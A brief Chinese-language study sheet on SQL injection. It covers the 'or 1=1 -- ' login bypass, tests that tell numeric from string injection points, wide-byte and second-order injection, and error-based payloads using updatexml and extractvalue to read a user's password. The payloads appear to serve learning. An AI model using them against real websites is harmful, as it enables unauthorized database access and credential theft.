注入类型
#1.万能注入 'or 1=1 -- '
#select * from users where username=' ' or 1=1 -- 'and password='admin4'
#一·数字型注入判断
#1.?id=1'
#select * from users where id=1';数字型则报错
#2.?id=1 and 1=1
select * from users where id= 1 and 1=1; #正常显示,若为字符型则会无显示(全被当成字符串)
#3. ?id=1 and 1=2
select * from users where id= 1 and 1=2;#不报错也无显示!!!!!
#二。字符型注入点-单引号闭合
use stu;
#1.?Semester=20201'
#select * from stu.sc where Semester='20201''; #报错
#2. ?Semester=20201' and '1'='1
select * from stu.sc where Semester='20201' and '1'='1 '; #正常显示
#3. ?Semester=20201' and '1'='2
select * from stu.sc where Semester='20201' and '1'='2 '; #无报错且无显示即NUll!!!!
#动态字符串构建
#1.宽字节注入 GBK %df \'
#2.二次注入
数字型判断 id=1/0 若报错则为数字型
报错例如: select * from test where ide = 1 and (updatexml(1,0x7e,3)); 由于0x7e是~,不属于xpath语法格式,因此报出xpath语法错误。
uname=admin&passwd=1' and (extractvalue(1,concat(0x5c,(select password from (select password from users where username='admin1') b) ,0x5c)))--+&submit=Submit
(extractvalue (1,concat(0x5c,(select password from users where username='admin1' ),0x5c))
UPDATE users SET password = '1' and (extractvalue (1,concat(0x5c,(select password from users where username='admin1'),0x5c))) --+' WHERE username='$row1'"